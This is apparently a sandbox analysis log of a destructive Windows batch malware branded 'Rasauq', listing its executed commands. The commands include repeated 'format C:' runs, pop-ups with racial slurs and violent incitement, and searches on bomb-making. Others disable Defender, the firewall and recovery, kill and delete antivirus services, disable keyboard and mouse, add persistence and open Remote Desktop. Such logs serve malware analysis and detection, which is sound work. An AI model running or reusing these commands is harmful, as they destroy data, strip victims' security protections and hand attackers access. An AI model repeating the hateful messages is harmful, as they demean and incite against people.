C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:5360
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:5176
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:5692
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:3392
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:3812
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:3636
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:3480
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:1676
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:5212
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:3696
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:4984
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:2004
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:5828
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:4264
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:5212
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:2508
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:3812
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:2508
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:3636
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:4912
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:5460
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:5864
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:2848
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:3480
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:1556
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:5460
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:5864
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:5788
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:5992
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:6252
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:6460
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:6516
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:6568
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:6612
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:6644
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:6660
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:6684
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:6700
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:6728
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:6736
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:7072
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:6268
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:6352
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:6272
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:6400
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:6504
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:6496
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:6536
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:6516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:6544
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:6580
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:6804
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:3812
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:1932
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:2712
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:6328
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:6348
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:6368
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:6444
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:3216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:6340
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:6324
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:6796
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:4984
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:4484
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:6248
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:6328
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:6356
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:2836
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:6392
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:6512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:6280
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:6492
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:6796
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:6360
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:6500
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:6252
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:3016
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:6576
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:7036
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:7020
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:6708
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:6768
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:6860
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:6196
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:6500
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:6876
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat"3⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:488 -
C:\Windows\system32\openfiles.exeopenfiles4⤵PID:2740
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "(new-object -com shell.application).minimizeall()"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1960
-
-
C:\Windows\system32\curl.execurl -O https://media.discordapp.net/attachments/1198940919777472532/1349364239487467550/IMG_3728.png4⤵PID:3052
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "Wallpaper" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f4⤵
- Sets desktop wallpaper using registry
PID:4260
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "WallpaperStyle" /t REG_SZ /d 10 /f4⤵PID:3852
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "TileWallpaper" /t REG_SZ /d 0 /f4⤵PID:4272
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Personalization" /v "LockScreenImage" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f4⤵PID:4648
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "OEMBackground" /t REG_DWORD /d 1 /f4⤵PID:1008
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "BackgroundType" /t REG_DWORD /d 0 /f4⤵PID:544
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "Background" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f4⤵PID:5324
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\DWM" /v "AccentColor" /t REG_DWORD /d 0x00000000 /f4⤵PID:5596
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:4032
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kbdhid" /v Start /t REG_DWORD /d 4 /f4⤵PID:5516
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mouhid" /v Start /t REG_DWORD /d 4 /f4⤵PID:1712
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "Windows Host Service" /tr "\"C:\Windows\System32\Rasauq\$77RasauqBroker.bat\"" /sc onlogon /rl highest /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:1252
-
-
C:\Windows\system32\sc.exesc stop WinDefend4⤵
- Launches sc.exe
PID:5752
-
-
C:\Windows\system32\sc.exesc config WinDefend start=disabled4⤵
- Launches sc.exe
PID:2832
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable4⤵PID:3712
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable4⤵PID:1436
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable4⤵PID:5544
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable4⤵PID:5612
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:1888
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d 4 /f4⤵
- Modifies security service
PID:6128
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows Defender" /v "Last Known Good" /t REG_DWORD /d 0 /f4⤵PID:3700
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center" /v "DisableSecurityCenter" /t REG_DWORD /d 1 /f4⤵PID:4128
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Services\MpsSvc" /v "Start" /t REG_DWORD /d 4 /f4⤵
- Modifies security service
PID:3768
-
-
C:\Windows\system32\cmd.execmd /c "C:\Windows\System32\Rasauq\$77RasauqBroker.bat"4⤵PID:4028
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f5⤵PID:3092
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2364
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im explorer.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2800
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object -ComObject SAPI.SpVoice).Volume = 100"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1696
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f4⤵PID:5580
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewContextMenu" /t REG_DWORD /d 1 /f4⤵PID:4844
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f4⤵PID:3876
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoSettings" /t REG_DWORD /d 1 /f4⤵PID:4692
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f4⤵PID:2380
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoAddPrinter" /t REG_DWORD /d 1 /f4⤵PID:5948
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAVerb" /t REG_DWORD /d 1 /f4⤵PID:2320
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:5208
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideIcons" /t REG_DWORD /d 1 /f4⤵PID:5180
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "InvertMouse" /t REG_DWORD /d 1 /f4⤵PID:688
-
-
C:\Windows\system32\ReAgentc.exereagentc /disable4⤵
- Drops file in Windows directory
PID:1972
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\Recovery\WinRE.wim /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5728
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\Recovery\WinRE.wim /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1520
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\Recovery /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4460
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\Recovery /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3860
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {current} recoveryenabled No4⤵
- Modifies boot configuration data using bcdedit
PID:3600
-
-
C:\Windows\system32\bcdedit.exebcdedit /deletevalue {default} recoveryenabled4⤵
- Modifies boot configuration data using bcdedit
PID:396
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WinRE" /v "DisableWinRE" /t REG_DWORD /d 1 /f4⤵PID:2236
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵PID:5908
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:1352
-
-
C:\Windows\system32\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f4⤵PID:4012
-
-
C:\Windows\system32\reg.exeREG DELETE "HKCU\Software\Policies\Microsoft\Windows Defender" /f4⤵PID:3864
-
-
C:\Windows\system32\sc.exesc stop WinDefend4⤵
- Launches sc.exe
PID:4104
-
-
C:\Windows\system32\sc.exesc config WinDefend start= disabled4⤵
- Launches sc.exe
PID:2324
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableAntiTamper $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1444
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableBehaviorMonitoring $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4920
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\mspmsnsv.dll" /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2740
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\wscsvc.dll" /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1108
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM mbam.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4628
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM MBAMService.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2256
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM mbamtray.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4168
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM mbamscheduler.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4100
-
-
C:\Windows\system32\sc.exesc stop MBAMService4⤵
- Launches sc.exe
PID:4520
-
-
C:\Windows\system32\sc.exesc delete MBAMService4⤵
- Launches sc.exe
PID:1704
-
-
C:\Windows\system32\sc.exesc stop MBAMProtector4⤵
- Launches sc.exe
PID:2280
-
-
C:\Windows\system32\sc.exesc delete MBAMProtector4⤵
- Launches sc.exe
PID:2708
-
-
C:\Windows\system32\sc.exesc stop MBAMChameleon4⤵
- Launches sc.exe
PID:4772
-
-
C:\Windows\system32\sc.exesc delete MBAMChameleon4⤵PID:5096
-
-
C:\Windows\system32\sc.exesc stop MBAMFarflt4⤵
- Launches sc.exe
PID:1676
-
-
C:\Windows\system32\sc.exesc delete MBAMFarflt4⤵
- Launches sc.exe
PID:5828
-
-
C:\Windows\system32\sc.exesc stop MBAMSwissArmy4⤵
- Launches sc.exe
PID:4656
-
-
C:\Windows\system32\sc.exesc delete MBAMSwissArmy4⤵
- Launches sc.exe
PID:5436
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Malwarebytes" /f4⤵PID:5816
-
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\SOFTWARE\Malwarebytes" /f4⤵PID:5844
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMService" /f4⤵PID:3160
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMChameleon" /f4⤵PID:1712
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMFarflt" /f4⤵PID:3836
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMSwissArmy" /f4⤵PID:5468
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdservicehost.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6108
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdagent.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:672
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdredline.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5608
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdparentalservice.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6024
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdreinit.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3276
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdsubwiz.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:124
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM seccenter.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4004
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM vsserv.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:244
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM epssecurityservice.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:980
-
-
C:\Windows\system32\sc.exesc stop bdservicehost4⤵PID:6004
-
-
C:\Windows\system32\sc.exesc delete bdservicehost4⤵
- Launches sc.exe
PID:1860
-
-
C:\Windows\system32\sc.exesc stop bdagent4⤵
- Launches sc.exe
PID:336
-
-
C:\Windows\system32\sc.exesc delete bdagent4⤵
- Launches sc.exe
PID:4452
-
-
C:\Windows\system32\sc.exesc stop bdredline4⤵
- Launches sc.exe
PID:3180
-
-
C:\Windows\system32\sc.exesc delete bdredline4⤵
- Launches sc.exe
PID:2780
-
-
C:\Windows\system32\sc.exesc stop bdparentalservice4⤵
- Launches sc.exe
PID:4680
-
-
C:\Windows\system32\sc.exesc delete bdparentalservice4⤵
- Launches sc.exe
PID:4400
-
-
C:\Windows\system32\sc.exesc stop bdreinit4⤵
- Launches sc.exe
PID:4284
-
-
C:\Windows\system32\sc.exesc delete bdreinit4⤵PID:5240
-
-
C:\Windows\system32\sc.exesc stop bdsubwiz4⤵
- Launches sc.exe
PID:2380
-
-
C:\Windows\system32\sc.exesc delete bdsubwiz4⤵
- Launches sc.exe
PID:1028
-
-
C:\Windows\system32\sc.exesc stop seccenter4⤵
- Launches sc.exe
PID:948
-
-
C:\Windows\system32\sc.exesc delete seccenter4⤵
- Launches sc.exe
PID:3808
-
-
C:\Windows\system32\sc.exesc stop vsserv4⤵
- Launches sc.exe
PID:4692
-
-
C:\Windows\system32\sc.exesc delete vsserv4⤵
- Launches sc.exe
PID:5076
-
-
C:\Windows\system32\sc.exesc stop epssecurityservice4⤵
- Launches sc.exe
PID:2184
-
-
C:\Windows\system32\sc.exesc delete epssecurityservice4⤵
- Launches sc.exe
PID:3920
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Bitdefender" /f4⤵PID:4496
-
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\SOFTWARE\Bitdefender" /f4⤵PID:6032
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdservicehost" /f4⤵PID:3900
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdagent" /f4⤵PID:3680
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdredline" /f4⤵PID:3476
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdparentalservice" /f4⤵PID:2848
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdreinit" /f4⤵PID:3764
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdsubwiz" /f4⤵PID:3648
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\seccenter" /f4⤵PID:4432
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vsserv" /f4⤵PID:5344
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\epssecurityservice" /f4⤵PID:5144
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:4752
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f4⤵PID:3628
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 /f4⤵PID:5776
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableOnAccessProtection" /t REG_DWORD /d 1 /f4⤵PID:2740
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1 /f4⤵PID:1960
-
-
C:\Windows\system32\sc.exesc stop WinDefend4⤵
- Launches sc.exe
PID:1492
-
-
C:\Windows\system32\sc.exesc delete WinDefend4⤵
- Launches sc.exe
PID:4756
-
-
C:\Windows\system32\sc.exesc stop SecurityHealthService4⤵
